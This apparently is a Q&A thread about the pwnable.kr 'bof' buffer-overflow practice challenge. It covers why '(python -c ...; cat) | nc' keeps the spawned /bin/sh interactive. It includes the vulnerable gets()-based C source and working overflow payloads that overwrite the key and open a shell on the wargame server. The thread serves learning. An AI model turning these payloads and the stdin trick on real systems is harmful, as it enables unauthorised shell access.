# what is the difference between "python -c 'print' " and "(python -c 'print'; cat)" in linux

Tags: python, c, linux, reverse-engineering, cracking

I usually use "python -c" to pass arguments to C program.

Like this:

```
$ python -c 'print "a" * 12' | ./program
```

but when I execute a BOF practice program [pwnable.kr/bof](https://github.com/USCGA/writeups/tree/master/pwnable.kr/bof), the

```
python -c 'print'
```

and

```
( python -c 'print'; cat )
```

work differently.

1. I wrote a exploit code like this:

   ```
   $ python -c 'print "a"*52 +"\xbe\xba\xfe\xca"' | nc pwnable.kr 9000
   ```

   but it didn't work, so I found stack_canary value.
2. ```
   $ python -c 'print "a"*32 +"\x0a"+ "a"*19 + "\xbe\xba\xfe\xca" ' | nc pwnable.kr 9000
   ```

   but it still didn't work
3. So I found other people's write up

   ```
   $ (python -c 'print "a"*52 +"\xbe\xba\xfe\xca"'; cat) | nc pwnable.kr 9000
   ```

   This exploit code successfully executed `/bin/sh`

Why this 3. exploit code passes stack canary and what is the difference between `python -c 'print'`  and  `(python -c 'print'; cat)` ?

```
#include <stdio.h>
#include <string.h>
#include <stdlib.h> 
void func(int key){
    char overflowme[32];
    printf("overflow me : ");
    gets(overflowme);   // smash me!
    if(key == 0xcafebabe){
        system("/bin/sh");
    }
    else{
        printf("Nah..\n");
    }
   }
 int main(int argc, char* argv[]){
    func(0xdeadbeef);
    return 0;
 }
```

bof.c source

```
$ python -c 'print "a"*52 +"\xbe\xba\xfe\xca"' | nc pwnable.kr 9000
```

*** stack smashing detected ***: /home/bof/bof terminated
overflow me :

Nah..

---

```
$ python -c 'print "a"*32 +"\x0a"' | nc pwnable.kr 9000
```

overflow me :

Nah..

---

```
$ (python -c 'print "a"*52 +"\xbe\xba\xfe\xca"'; cat) | nc pwnable.kr 9000
```

successfully execute /bin/sh

Comment: I tried to edit your post, so basically what you want to say is: When you execute the command `(python -c 'print "a"*52 +"\xbe\xba\xfe\xca"'; cat) | nc pwnable.kr 9000` you successfully execute `/bin/sh`. When you execute `python -c 'print "a"*52 +"\xbe\xba\xfe\xca"' | nc pwnable.kr 9000` you get _stack smashing detected_. Right?

Answer (score 2, accepted):

```
cat /dev/null | /bin/sh
```

This will run `/bin/sh` shell (and abuse cats, but will leave them for a moment) and the shell `/bin/sh` will immediately close without writing anything. `/bin/sh` runs an *interactive* shell, but as the standard input of the shell is closed (either by `<nothing> |` or by `</dev/null`) the shell detects that the input has ended (it reads `EOF`) and exists immediately.

Now let's complicate the example:

```
$ cat <<EOF >bof.c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void func(int key){
     // bla bla bla 
        system("/bin/sh");
}
int main(int argc, char* argv[]){
    func(0xdeadbeef);
    return 0;
}
EOF

$ gcc bof.c -o bof
$ python -c 'print "a"*52 +"\xbe\xba\xfe\xca"' | ./bof
```

The `./bof` program calls `system("/bin/sh")` if stack smashing was successful. But the shell `/bin/sh` would try to still read standard input. As there is nothing more to read (as the input `python -c 'print "a"*52 +"\xbe\xba\xfe\xca"'` ended) it will read `EOF` and exit immediately.

To write a string from a program and then allow the input to be interactive again, you can use a subshell with `cat`:

```
 ( printf "\x11\xbe\xba\xfe\xca" ; cat )
```

This will first run the `printf` command, then run the `cat`. `cat` will read from standard input after `printf` ended, so the console will act as an interactive again.

Answer (score 2):

Take a look at the accepted answer for this question, it does a pretty good job explaining this.

https://reverseengineering.stackexchange.com/questions/11777/how-to-effectively-bypass-gcc-stack-smashing-detection

Comment: Although your effort for answer is appreciated, link only answers are generally not considered as good  answers, try adding some basic details that helps OP to your answer and then link to the aforementioned answer for more info.

Comment: Ah, thanks for the kind response. And you are absolutely right. I'll try to add some details next time. (I tried to post this as a comment at first, but I just now made this account and apparently I need 50 reputation first)